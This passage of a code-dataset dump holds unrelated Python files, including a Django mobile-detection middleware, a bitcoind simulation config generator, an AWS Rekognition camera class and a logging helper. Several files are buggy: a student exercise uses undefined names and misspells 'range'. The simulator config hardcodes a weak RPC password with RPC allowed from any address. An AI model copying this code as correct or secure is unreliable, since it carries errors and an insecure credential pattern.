0)):\n\t\t\t\t\tgoogleCounterR +=1\n\t\t\t\t\tgoogleBlocksR.append(block)\n\toneReviews = 0\n\tones = 0\n\toneReviewFile = open('./googleExtensions/oneReviewsComments.txt', 'w')\n\tfor (ext1,ext2) in zip(googleBlocks,googleBlocksR):\n\t\tfor eachScore in ext1:\n\t\t\tscoreLine = eachScore.split('\\t')[0]\n\t\t\tif(str(scoreLine) == '1'):\t\n\t\t\t\tones +=1\n\t\t\t\tdateLine = eachScore.split('\\t')[1]\t\n\t\t\t\tfor review in ext2:\n\t\t\t\t\tif(str(review.split('\\t')[-1]) == str(dateLine)):\n\t\t\t\t\t\toneReviews += 1\n\t\t\t\t\t\toneReviewFile.write(review + ext2[1] + '\\n')\n\tprint(ones)\n\tprint(oneReviews)\n\nif __name__ == '__main__':\n\tsearch12Names()","sub_path":"src/CodeFirstStage_Crawl_Anomaly/examineGoogleReviews.py","file_name":"examineGoogleReviews.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"322735302","text":"\nmobile_uas = [\n 'w3c ','acs-','alav','alca','amoi','audi','avan','benq','bird','blac',\n 'blaz','brew','cell','cldc','cmd-','dang','doco','eric','hipt','inno',\n 'ipaq','java','jigs','kddi','keji','leno','lg-c','lg-d','lg-g','lge-',\n 'maui','maxo','midp','mits','mmef','mobi','mot-','moto','mwbp','nec-',\n 'newt','noki','palm','pana','pant','phil','play','port','prox','qwap',\n 'sage','sams','sany','sch-','sec-','send','seri','sgh-','shar','sie-',\n 'siem','smal','smar','sony','sph-','symb','t-mo','teli','tim-','tosh',\n 'tsm-','upg1','upsi','vk-v','voda','wap-','wapa','wapi','wapp','wapr',\n 'webc','winw','winw','xda','xda-'\n ]\n \nmobile_ua_hints=['SymbianOS', 'Opera Mini', 'iPhone', 'Android', 'Opera Mobi', 'webOS']\n\n\ndef is_mobile_browser(request):\n full_ua = request.META.get('HTTP_USER_AGENT', '')\n ua = full_ua.lower()[0:4]\n if ua in mobile_uas:\n return True\n for hint in mobile_ua_hints:\n if full_ua.find(hint) >= 0:\n return True\n return False\n\nclass MobileDetectionMiddleware(object):\n \"\"\"Middleware to detect if a useragent is mobile and set a session accordingly\"\"\"\n def process_request(self, request):\n mobile = is_mobile_browser(request)\n request.is_mobile = mobile and request.site.mobile_enabled()\n\n","sub_path":"tiger/utils/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"366418054","text":"import sys\nimport lxml.etree as ET\n\ndef setup_multiple_node_xml(node_num, simultime, bool_, algorithm, difficulty):\n\n base_xml = \"example.xml\"\n new_xml = \"output.xml\"\n\n if bool_ == True:\n new_xml = sys.argv[6] + \"/\" + new_xml\n else:\n new_xml = sys.argv[9] + \"/\" + new_xml\n\n\n parser = ET.XMLParser(remove_blank_text=True, strip_cdata=False)\n tree = ET.parse(base_xml, parser)\n shadow = tree.getroot()\n\n for node in shadow.findall('node'):\n shadow.remove(node)\n for node in shadow.findall('kill'):\n shadow.remove(node)\n ET.SubElement(shadow, \"kill\", time=str(simultime))\n\n for i in range(0, node_num):\n node_id = \"bcdnode%d\" % (i)\n node_iphint = \"%d.%d.0.1\" % (i/256 + 1, i%256)\n node = ET.SubElement(shadow, \"node\", id=node_id, iphint=node_iphint)\n time = str(0)\n if i==0:\n argument = \"-debug -reindex -datadir=data/bcdnode%d -port=18333 -txindex=1 -fallbackfee=0.0002 -rpcuser=a -rpcpassword=1234 -rpcport=11111 -rpcallowip=%s/0 -rpcbind=%s -addnode=%d.%d.0.1:18333 -addnode=%d.%d.0.1:18333 -algorithm=%s -difficulty=%s\" % (i, (node_iphint), (node_iphint), (node_num-1)/256 + 1, (node_num-1)%256, (i+1)/256 + 1, (i+1)%256, algorithm, difficulty)\n elif i<(node_num-1):\n argument = \"-debug -reindex -datadir=data/bcdnode%d -port=18333 -txindex=1 -fallbackfee=0.0002 -rpcuser=a -rpcpassword=1234 -rpcport=11111 -rpcallowip=%s/0 -rpcbind=%s -addnode=%d.%d.0.1:18333 -addnode=%d.%d.0.1:18333 -algorithm=%s -difficulty=%s\" % (i, (node_iphint), (node_iphint), (i-1)/256 + 1, (i-1)%256, (i+1)/256 + 1, (i+1)%256, algorithm, difficulty)\n else:\n argument = \"-debug -reindex -datadir=data/bcdnode%d -port=18333 -txindex=1 -fallbackfee=0.0002 -rpcuser=a -rpcpassword=1234 -rpcport=11111 -rpcallowip=%s/0 -rpcbind=%s -addnode=%d.%d.0.1:18333 -addnode=%d.%d.0.1:18333 -algorithm=%s -difficulty=%s\" % (i, (node_iphint), (node_iphint), (i-1)/256 + 1, (i-1)%256, 1, 0, algorithm, difficulty)\n ET.SubElement(node,\"application\", plugin=\"bitcoind\", time=time, arguments=argument)\n\n for i in range(0, node_num):\n node_id = \"client%d\" % (i)\n node = ET.SubElement(shadow, \"node\", id=node_id)\n time = str(5)\n argument = \"%d.%d.0.1:11111 %d \" % (i/256 + 1, i%256, (simultime-8))\n ET.SubElement(node,\"application\", plugin=\"client\", time=time, arguments=argument)\n\n if bool_ == True:\n \n tree.write(new_xml, pretty_print=True)\n else :\n node_id = \"injector\"\n node = ET.SubElement(shadow, \"node\", id=node_id)\n time = str(8)\n txcnt = sys.argv[6]\n if txcnt > -1:\n txsec = sys.argv[7]\n amount = sys.argv[8]\n argument = \"1.0.0.1:11111 %s %s %s \" % (txcnt, txsec, amount)\n elif txcnt == \"-1 \":\n argument= \"1.0.0.1:11111 0 0 0 \"\n ET.SubElement(node,\"application\", plugin=\"txInjector\", time=time, arguments=argument)\n\n tree.write(new_xml, pretty_print=True)\n print(\"generating xml is finished \")\n\ndef select_option(param1,node_count, sim_time, algorithm, difficulty):\n if param1 == \"disable\":\n setup_multiple_node_xml(node_count, sim_time, True, algorithm, difficulty)\n elif param1 == \"enable\":\n print(\"enable is start \")\n setup_multiple_node_xml(node_count, sim_time, False, algorithm, difficulty)\n\nif __name__ == '__main__':\n print(\"start make_approximate_setmining_test.py start \")\n\n node_count = int(sys.argv[1])\n simulation_time = int(sys.argv[2])\n algorithm = sys.argv[3]\n txmode = sys.argv[4]\n difficulty = sys.argv[5]\n \n select_option(txmode, node_count, simulation_time, algorithm, difficulty)","sub_path":"testlibs/xmlGenerator.py","file_name":"xmlGenerator.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"58111279","text":"# -*- coding: utf-8 -*-\nimport numpy as np\ndef xmatriz(M):\n x=0\n cont=0\n soma=0\n parame=0\n for i in range(M.shape[0]):\n for j in range(M.shape[1]):\n soma=soma+M[i,j]\n if soma==parame:\n x=soma\n contador=contador+1\n break\n parame=soma\n soma=0\n if contador==0:\n soma=0\n contador=0\n for i in range(1,M.shape[0]):\n for j in range(M.shape[1]):\n soma=soma+M[i,j]\n if soma==parame:\n x=soma\n contador=contador+1\n break\n parame=soma\n soma=0\n return(x)\n\na=int(input('digite o numero de elementos:'))\nM=np.zeros((a,a))\nfor i in range(M.shape[0]):\n for j in tange(M.shape[1]):\n M[i,j]=int(input('elemento:'))\nsomaL=xmatriz(M)\nprint(somaL)\n\n","sub_path":"moodledata/vpl_data/111/usersdata/195/63735/submittedfiles/av2_p3_m2.py","file_name":"av2_p3_m2.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"136396591","text":"row = 5\ncol = 5\n\n\ndef isPath(arr):\n path = False\n paths = []\n for index, i in enumerate(arr):\n if i[index] == 0:\n path = True\n paths.append(0)\n else:\n path = False\n if paths != [0, 0, 0, 0, 0]:\n return False\n else:\n return True\n\n# Test data\narr = [[0, 0, 0, -1, 0],\n [0, 0, 0, -1, -1],\n [0, 0, 0, -1, 0],\n [-1, 0, -1, 0, -1],\n [0, 0, -1, 0, 0]]\n\n# Main test\nif (isPath(arr)):\n print(\"Yes\")\nelse:\n print(\"No\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"63009460","text":"\n\"\"\"\nAndrew Kavas\nLargest Product in a Grid\nE_11\n\n\"\"\"\n\nimport numpy as np\n\narr = []\nvarr = []\nrarr = np.zeros((20,20))\n\nwith open('E_11_matrix.txt', 'r') as f:\n for line in f:\n arr.append(line)\n split_line = line.split(' ')\n #varr.append(split_line)\n for values in split_line:\n value_as_int = int(values)\n varr.append(value_as_int)\n\nfor kk in range(0,20):\n rarr[kk] = varr[kk*20:(kk+1)*20]\n\nprint('//')\n\n#print(arr)\n#print(varr)\n#print(rarr)\n#print(rarr[1,0])\n\nprods = []\n\ndef sweep(num):\n for jj in range(0,20):\n for kk in range(0,17):\n prod = rarr[jj,kk]*rarr[jj,kk+1]*rarr[jj,kk+2]*rarr[jj,kk+3]\n prods.append(prod)\n# #print(prod)\n for jj in range(0,20):\n for kk in range(0,17):\n prod = rarr[kk,jj]*rarr[kk+1,jj]*rarr[kk+2,jj]*rarr[kk+3,jj]\n prods.append(prod)\n# #print(prod)\n for jj in range(0,17):\n for kk in range(0,17):\n prod = rarr[kk,jj]*rarr[kk+1,jj+1]*rarr[kk+2,jj+2]*rarr[kk+3,jj+3]\n prods.append(prod)\n# #print(prod)\n for jj in range(0,17):\n for kk in range(0,17):\n prod = rarr[kk+3,jj]*rarr[kk+2,jj+1]*rarr[kk+1,jj+2]*rarr[kk,jj+3]\n prods.append(prod)\n #print(prods)\n print(max(prods))\n \n\n#print(prods)\n#print(len(prods))\n\nsweep(4)\n\n","sub_path":"pyPhys/euler/E_11_prac.py","file_name":"E_11_prac.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"654115593","text":"import boto3\nimport io\nimport rospy\nimport sys\n\nfrom io import BytesIO\nfrom picamera import PiCamera\nfrom PIL import Image, ImageDraw, ExifTags, ImageColor, ImageFont\n\nAWS_REKOGNITION_COLLECTION = 'family_and_friends'\n\n# Initialize boto resources\ns3_client = boto3.client('s3')\nrekognition_client = boto3.client('rekognition')\ndynamodb_resource = boto3.resource('dynamodb')\ndynamodb_client = boto3.client('dynamodb')\n\n# Initialize the camera, since it takes a couple of seconds for the camera to adjust to light levels\ncamera = PiCamera()\ncamera.rotation = 180\n\n# Load font for labels\nfont = ImageFont.truetype(\"./Amazon-Ember-Regular.ttf\",12)\n\nclass CameraImage():\n \"\"\"Functions to interact with images from Raspberry Pi camera\n \"\"\"\n def __init__(self, filename):\n\n camera.capture(filename) # Saves the image to a file\n\n self.image = Image.open(filename)\n self.annotated_image = self.image\n self.bucket = \"jeffnunn-public\" # change to your own bucket\n self.draw = ImageDraw.Draw(self.annotated_image)\n self.filename = filename\n self.labels = []\n self.label_confidence_threshold = 90\n self.recognized_people = []\n \n def upload_annotated_image_to_s3(self, filename):\n \"\"\"Uploads an annotated (labeled) image to S3.\n \"\"\"\n response = s3_client.upload_file(filename, self.bucket, filename, ExtraArgs={'ACL':'public-read'})\n \n return response\n \n def recognize_people(self):\n \"\"\"Sends an image to Amazon Rekognition to do facial recognition\n \"\"\"\n\n with open(self.filename, 'rb') as image:\n response = rekognition_client.search_faces_by_image(CollectionId = AWS_REKOGNITION_COLLECTION, Image={'Bytes': image.read()})\n \n if response:\n\n imgWidth, imgHeight = self.annotated_image.size\n \n for match in response['FaceMatches']:\n \n # Lookup the person's name\n face = dynamodb_client.get_item(\n TableName='rekognition_family_and_friends', \n Key={'RekognitionId': {'S': match['Face']['FaceId']}}\n )\n \n if 'Item' in face:\n\n if face['Item']['FullName']['S'] not in self.recognized_people:\n person = face['Item']['FullName']['S']\n print(f\"I recognized {person}\")\n self.recognized_people.append(person)\n\n # Get details for annotation\n box = response['SearchedFaceBoundingBox']\n left = imgWidth * box['Left']\n top = imgHeight * box['Top']\n width = imgWidth * box['Width']\n height = imgHeight * box['Height']\n\n points = (\n (left,top),\n (left + width, top),\n (left + width, top + height),\n (left , top + height),\n (left, top)\n )\n\n # Outline face\n self.draw.line(points, fill='#ff9900', width=3)\n \n if top <= 30: # add label to bottom of box\n text_top = top + height + 5\n else:\n text_top = top - 20 # add label to top of box\n \n # Label face\n self.draw.text((left, text_top), face['Item']['FullName']['S'], (255, 153, 0), font=font)\n\n return self.recognized_people\n\n def detect_labels(self):\n \"\"\"Sends an image to Amazon Rekognition to detect lables\n \"\"\"\n \n with open(self.filename, 'rb') as image:\n response = rekognition_client.detect_labels(Image={'Bytes': image.read()}, MaxLabels=5)\n\n if response:\n\n imgWidth, imgHeight = self.annotated_image.size\n \n for label in response['Labels']:\n if label['Confidence'] >= self.label_confidence_threshold:\n\n self.labels.append(label['Name'])\n print(f\"Label detected: {label}\")\n\n # Get details for annotation\n for instance in label['Instances']:\n box = instance['BoundingBox']\n left = imgWidth * box['Left']\n top = imgHeight * box['Top']\n width = imgWidth * box['Width']\n height = imgHeight * box['Height']\n\n points = (\n (left,top),\n (left + width, top),\n (left + width, top + height),\n (left , top + height),\n (left, top)\n )\n\n # Outline object\n self.draw.line(points, fill='#fa5ea7', width=2)\n \n if top <= 30: # add label to bottom of box\n text_top = top + height + 5\n else:\n text_top = top - 20 # add label to top of box\n \n # Label object\n print(f\"labeling {label['Name']}\")\n self.draw.text((left, text_top), label['Name'], (250, 94, 167), font=font)\n\n return self.labels\n\n def save_scene(self, session_id):\n \"\"\"Saves annotations and writes results (objects/people in scene) to DDB\n \"\"\"\n\n print(\"Saving annotated picture\")\n self.annotated_image.save(f'./annotated.jpg')\n self.upload_annotated_image_to_s3('annotated.jpg')\n\n table = dynamodb_resource.Table('TwitchRobot_Scenes')\n payload = {\n 'session_id': session_id,\n 'recognized_people': self.recognized_people,\n 'labels': self.labels\n }\n \n try:\n response = table.put_item(\n Item=payload\n )\n return \"Scene saved\"\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n error = \"Entry already exists\"\n print(error)\n else:\n error = e\n print(f\"Unexpected error: {error}\")\n \n return error\n \n ","sub_path":"create_ws/src/alexa/src/CameraImage.py","file_name":"CameraImage.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"436603135","text":"import os\nimport sys\nimport logging\nimport logging.config\nimport traceback\nimport io\nimport yaml\n\n\n# Main\ndef setup(filename=None, config_yaml=None, **kwargs):\n \"\"\"Setup logging configuration \"\"\"\n\n # Make sure filename is set\n if not filename:\n raise Exception('filename parameter missing')\n\n # Load logging configuration\n if not config_yaml:\n path = os.path.dirname(os.path.realpath(__file__))\n config_yaml = os.path.join(path, 'logging.yaml')\n\n # Read logging yaml configuration file\n with open(config_yaml, 'rt') as f:\n config = yaml.safe_load(f.read())\n\n # Modify log file name with argument\n config[\"handlers\"][\"file_handler\"][\"filename\"]=filename\n\n # Configure logging with yaml file\n logging.config.dictConfig(config)\n\n # Instantiate logger\n logger = logging.getLogger(__name__)\n\n # Assign argument values to logger\n if kwargs:\n logger = logging.LoggerAdapter(logger, kwargs)\n\n # Custom log methods\n def myDebug(self, msg, **kwargs):\n orig_dict = logger.extra\n if kwargs: logger.extra = {**logger.extra, **kwargs}\n self.log(logging.DEBUG, msg)\n logger.extra = orig_dict\n\n def myInfo(self, msg, **kwargs):\n orig_dict = logger.extra\n if kwargs: logger.extra = {**logger.extra, **kwargs}\n self.log(logging.INFO, msg)\n logger.extra = orig_dict\n\n def myWarning(self, msg, **kwargs):\n orig_dict = logger.extra\n if kwargs: logger.extra = {**logger.extra, **kwargs}\n self.log(logging.WARNING, msg)\n logger.extra = orig_dict\n\n def myError(self, msg, **kwargs):\n orig_dict = logger.extra\n if kwargs: logger.extra = {**logger.extra, **kwargs}\n self.log(logging.ERROR, msg)\n logger.extra = orig_dict\n\n def myCritical(self, msg, **kwargs):\n orig_dict = logger.extra\n if kwargs: logger.extra = {**logger.extra, **kwargs}\n self.log(logging.CRITICAL, msg)\n logger.extra = orig_dict\n\n def addLevelName(level, levelName):\n \"\"\"\n Associate 'levelName' with 'level'.\n This is used when converting levels to text during message formatting.\n \"\"\"\n _acquireLock()\n try: # unlikely to cause an exception, but you never know...\n _levelToName[level] = levelName\n _nameToLevel[levelName] = level\n finally:\n _releaseLock()\n\n if hasattr(sys, '_getframe'):\n currentframe = lambda: sys._getframe(3)\n else: # pragma: no cover\n def currentframe():\n \"\"\"Return the frame object for the caller's stack frame.\"\"\"\n try:\n raise Exception\n except Exception:\n return sys.exc_info()[2].tb_frame.f_back\n\n _srcfile = os.path.normcase(addLevelName.__code__.co_filename)\n\n def myFindCaller(self, stack_info=False, stacklevel=1):\n # Increase stack level to get calling script of logplus\n stacklevel += 1\n\n f = currentframe()\n if f is not None:\n f = f.f_back\n orig_f = f\n while f and stacklevel > 1:\n f = f.f_back\n stacklevel -= 1\n if not f:\n f = orig_f\n rv = \"(unknown file)\", 0, \"(unknown function)\", None\n while hasattr(f, \"f_code\"):\n co = f.f_code\n filename = os.path.normcase(co.co_filename)\n if filename == _srcfile:\n f = f.f_back\n continue\n sinfo = None\n if stack_info:\n sio = io.StringIO()\n sio.write('Stack (most recent call last):\\n')\n traceback.print_stack(f, file=sio)\n sinfo = sio.getvalue()\n if sinfo[-1] == '\\n':\n sinfo = sinfo[:-1]\n sio.close()\n rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)\n break\n return rv\n\n # Define subclassed functions\n logger.__class__.debug = myDebug\n logger.__class__.info = myInfo\n logger.__class__.warn = myWarning\n logger.__class__.warning = myWarning\n logger.__class__.error = myError\n logger.__class__.critical = myCritical\n logger.logger.findCaller = myFindCaller\n\n # Return custom logger\n return logger\n\n\nif __name__ == '__main__':\n\n # Test logger with log file and parameters\n arg1 = \"argument1\"\n uuid = \"23RS2F\"\n log = setup('test.log', arg1=arg1, uuid=uuid)\n\n # Create a log entry\n log.warning(\"Application message\", count=1)\n\n","sub_path":"pypi_install_script/logplus-0.1.15-py2.py3-none-any/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"464110083","text":"# coding:utf-8\nimport requests\nimport json\n\nurl = 'http://www.csindex.com.cn/uploads/file/autofile/cons/000300cons.xls'\n\nherder = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n # \"Cookie\": \"你抓到的cookies\",\n \"Connection\": \"keep-alive\"\n}\n\nr = requests.get(url, headers=herder)\n\n# open打开excel文件,报存为后缀为xls的文件\nfp = open(\"yoyo.xls\", \"wb\")\nfp.write(r.content)\nfp.close()\n\nwith open('store.json', 'r') as f:\n data = json.load(f)\n\nprint(data)\n","sub_path":"python/downloadExl.py","file_name":"downloadExl.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"171757018","text":"from get_data import *\nimport defines\n\nif __name__ == \"__main__\":\n\tniveis = [defines.Nivel.GRADUACAO]\n\tcampus = [defines.Campus.DARCY, defines.Campus.PLANALTINA, defines.Campus.CEILANDIA, defines.Campus.GAMA]\n\teverything = []\n\tfor nivel in niveis:\n\t\tfor campi in campus:\n\t\t\teverything.append(CAMPI(nivel, campi))\n\tfor campi in everything:\n\t\tcampi.get_all()\n\n\tcons = everything[0]\n\t\n\t\n\t#for campi in everything:\n\t#\tfor departamento in campi.lista:\n\t#\t\tprint(departamento)\n\n\t","sub_path":"Mining/Classes/geral.py","file_name":"geral.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"389888727","text":"# -*- coding: utf-8 -*-\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nimport matplotlib.patches as mpatches\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport wx\n\nclass Canvas (FigureCanvas):\n def __init__(self, parent):\n self.figure = Figure()\n self.figure.set_facecolor('white')\n self.ax = self.figure.add_axes([0.1,0.1,0.8,0.8], aspect='equal')\n\n #self.ax_prog = self.figure.add_axes([0.8,0.1, 0.1,0.8], aspect='equal')\n \n FigureCanvas.__init__(self, parent, -1, self.figure)\n self.Fit()\n\n def show(self, data):\n self.ax.clear()\n l1, = self.ax.plot(data[:,1], data[:,2])\n self.draw()\n\nclass CanvasLine (FigureCanvas):\n def __init__(self, parent):\n self.figure = Figure()\n self.figure.set_facecolor('white')\n self.ax = self.figure.add_axes([0.05,0.05,0.9,0.9])\n #self.ax_prog = self.figure.add_axes([0.8,0.1, 0.1,0.8], aspect='equal')\n \n FigureCanvas.__init__(self, parent, -1, self.figure)\n self.Fit()\n\n def show(self, title, data):\n self.ax.clear()\n self.ax.set_title(title)\n l1, = self.ax.plot(data[0], '-ro', lw=2)\n l2, = self.ax.plot(data[1], '-bo', lw=2)\n self.ax.legend((l1, l2), ('Axis-Y', 'Axis-Z'))\n self.draw()","sub_path":"view/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"24476783","text":"# -*- coding: utf-8 -*-\n\n\nfrom controller import PublicPath\n\n\ndef modifyUserSettings(key, value):\n from configparser import ConfigParser\n config = ConfigParser()\n settingsFile = PublicPath('settings', 'luncher.cfg')\n config.read(settingsFile)\n config.set('LUNCHER', key, value)\n\n with open(settingsFile, 'w') as configfile:\n config.write(configfile)\n","sub_path":"appcore/initialization/modifyUserSettings.py","file_name":"modifyUserSettings.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407248988","text":"import logging\n\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QFormLayout, QLabel, QLineEdit, QDialog, QDialogButtonBox\n\nfrom sportorg import config\nfrom sportorg.gui.global_access import GlobalAccess\nfrom sportorg.gui.utils.custom_controls import AdvComboBox\nfrom sportorg.language import _\nfrom sportorg.models.constant import get_countries, get_regions\nfrom sportorg.models.memory import race, Organization, find\nfrom sportorg.modules.teamwork import Teamwork\n\n\nclass OrganizationEditDialog(QDialog):\n def __init__(self, organization, is_new=False):\n super().__init__(GlobalAccess().get_main_window())\n assert (isinstance(organization, Organization))\n self.current_object = organization\n self.is_new = is_new\n\n def exec(self):\n self.init_ui()\n self.set_values_from_model()\n return super().exec()\n\n def init_ui(self):\n self.setWindowTitle(_('Team properties'))\n self.setWindowIcon(QIcon(config.ICON))\n self.setSizeGripEnabled(False)\n self.setModal(True)\n\n self.layout = QFormLayout(self)\n\n self.label_name = QLabel(_('Name'))\n self.item_name = QLineEdit()\n self.item_name.textChanged.connect(self.check_name)\n self.layout.addRow(self.label_name, self.item_name)\n\n self.label_country = QLabel(_('Country'))\n self.item_country = AdvComboBox()\n self.item_country.addItems(get_countries())\n self.layout.addRow(self.label_country, self.item_country)\n\n self.label_region = QLabel(_('Region'))\n self.item_region = AdvComboBox()\n self.item_region.addItems(get_regions())\n self.layout.addRow(self.label_region, self.item_region)\n\n self.label_city = QLabel(_('City'))\n self.item_city = QLineEdit()\n self.layout.addRow(self.label_city, self.item_city)\n\n self.label_address = QLabel(_('Address'))\n self.item_address = QLineEdit()\n self.layout.addRow(self.label_address, self.item_address)\n\n self.label_contact = QLabel(_('Contact'))\n self.item_contact = QLineEdit()\n self.layout.addRow(self.label_contact, self.item_contact)\n\n def cancel_changes():\n self.close()\n\n def apply_changes():\n try:\n self.apply_changes_impl()\n except Exception as e:\n logging.error(str(e))\n self.close()\n\n button_box = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n self.button_ok = button_box.button(QDialogButtonBox.Ok)\n self.button_ok.setText(_('OK'))\n self.button_ok.clicked.connect(apply_changes)\n self.button_cancel = button_box.button(QDialogButtonBox.Cancel)\n self.button_cancel.setText(_('Cancel'))\n self.button_cancel.clicked.connect(cancel_changes)\n self.layout.addRow(button_box)\n\n self.show()\n\n def check_name(self):\n name = self.item_name.text()\n self.button_ok.setDisabled(False)\n if name and name != self.current_object.name:\n org = find(race().organizations, name=name)\n if org:\n self.button_ok.setDisabled(True)\n\n def set_values_from_model(self):\n\n self.item_name.setText(self.current_object.name)\n self.item_name.selectAll()\n self.item_city.setText(self.current_object.address.city)\n\n if self.current_object.address.country is not None:\n self.item_country.setCurrentText(self.current_object.address.country.name)\n if self.current_object.address.state:\n self.item_region.setCurrentText(self.current_object.address.state)\n if self.current_object.contact is not None:\n self.item_contact.setText(self.current_object.contact.value)\n if self.current_object.address is not None:\n self.item_address.setText(self.current_object.address.street)\n\n def apply_changes_impl(self):\n org = self.current_object\n assert (isinstance(org, Organization))\n if self.is_new:\n race().organizations.insert(0, org)\n\n if org.name != self.item_name.text():\n org.name = self.item_name.text()\n\n if org.address.country.name != self.item_country.currentText():\n org.address.country.name = self.item_country.currentText()\n\n if org.address.state != self.item_region.currentText():\n org.address.state = self.item_region.currentText()\n\n if org.address.city != self.item_city.text():\n org.address.city = self.item_city.text()\n\n if org.address.street != self.item_address.text():\n org.address.street = self.item_address.text()\n\n if org.contact.value != self.item_contact.text():\n org.contact.value = self.item_contact.text()\n org.contact.name = 'phone'\n\n GlobalAccess().get_main_window().refresh()\n Teamwork().send(org.to_dict())\n","sub_path":"sportorg/gui/dialogs/organization_edit.py","file_name":"organization_edit.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"492129137","text":"'''\nCommunicating through serial port using pySerial\n'''\n\nimport serial\nimport serial.tools.list_ports\nimport os\n\nclass Serial_control():\n\n def __init__(self, comm_port, timeout=2, on_close=None, log=None, verbose=False):\n self.alive = False\n self.on_close = on_close\n self.log = log\n\n self.sp = None\n self.verbose = verbose\n if comm_port is not None:\n self.comm_port = comm_port\n else:\n lpis = list(serial.tools.list_ports.comports()) # lpi = ListPortInfo object\n for lpi in lpis:\n self.comm_port = lpi[0] # here we end up using the last one found\n print('found', lpi[0], ' description:',lpi[1])\n self.sp = serial.Serial(self.comm_port, timeout=timeout) # connect to serial port\n\n if self.verbose:\n print('connected as \"',self.sp.name,'\"',sep='') # determine and mention which port was really used\n\n # self.sp.baudrate = 9600\n # self.sp.bytesize = serial.EIGHTBITS\n # self.sp.parity = serial.PARITY_NONE\n # self.sp.stopbits = serial.STOPBITS_TWO\n self.sp.timeout = timeout\n self.sp.write_timeout = timeout\n\n def __del__(self):\n try:\n if self.alive:\n self.close()\n except:\n pass # XXX errors on shutdown\n\n def __flush__(self):\n self.sp.flush()\n\n def open(self):\n \"\"\"open serial port\"\"\"\n\n try:\n self.sp.rts = False\n self.sp.open()\n except Exception as msg:\n self.handle_serial_error(msg)\n\n self.serial_settings_backup = self.sp.get_settings()\n\n # now we are ready\n self.alive = True\n\n def close(self):\n \"\"\"Close serial port\"\"\"\n if self.log is not None:\n self.log.info(\"{}: closing...\".format(self.comm_port))\n self.alive = False\n self.sp.__flush__\n self.sp.close()\n\n if self.on_close is not None:\n # ensure it is only called once\n callback = self.on_close\n self.on_close = None\n callback(self)\n\n\n def handle_serial_read(self):\n \"\"\"Read data from serial port\"\"\"\n try:\n data = self.sp.read_until().decode()\n if len(data) != 0:\n return data\n else:\n self.handle_serial_error('Read recieve 0 Bytes')\n except Exception as msg:\n self.handle_serial_error(msg)\n\n def handle_serial_write(self, cmd):\n \"\"\"Write cmd as bytes to serial port\"\"\"\n \n try:\n l = self.sp.write(cmd)\n\n if l != len(cmd):\n self.sp.flush() # nominally, waits until all data is written\n\n if self.verbose:\n print('send_cmd(\"',cmd,'\")', sep='',end='')\n\n c_r = self.sp.read_until().decode()\n\n if self.verbose:\n print(' -->', c_r)\n\n return c_r\n\n except Exception as msg:\n self.handle_serial_error(msg)\n\n def handle_serial_error(self, error=None):\n \"\"\"Serial port error\"\"\"\n # terminate connection\n self.close()\n print(self.comm_port + ' closed due to error: ' + error)\n","sub_path":"serial_control.py","file_name":"serial_control.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"207360684","text":"'''\nFor each line of parsed WordNet files, save it as a new json element \n\nLucas Zanella, 13/02/2017\n'''\n\nimport wordnet_to_dict as WN\nimport json\nimport os\n\n#User defined area---------\nDIR = \"json_files\"\nWORDNET_DIR = \"dict\"\n#--------------------------\n\n'''\nkwargs_from_file_reading are kwargs sent by the iterator that \nreads the file line per line, kwargs are from file constructor\nkwargs_from_file_reading is mainly used to know in which line\nwe are \n'''\n\ndef to_json(line, kwargs, kwargs_from_file_reading):\n \"\"\"Inserts a new line into kwargs['file_object'] file object\"\"\"\n original_file_name = kwargs['original_file_name']\n file_object = kwargs['file_object']\n is_first_line = kwargs_from_file_reading['is_first_line']\n if 'index' in original_file_name: #if it's an index file\n #We pop the counters as we don't need them in json\n line.pop('p_cnt', None)\n line.pop('synset_cnt', None)\n line.pop('sense_cnt', None)\n line.pop('tagsense_cnt', None)\n if 'data' in original_file_name and 'wn-' not in original_file_name:\n #if it's a data file but not a wn-lang-data... file\n 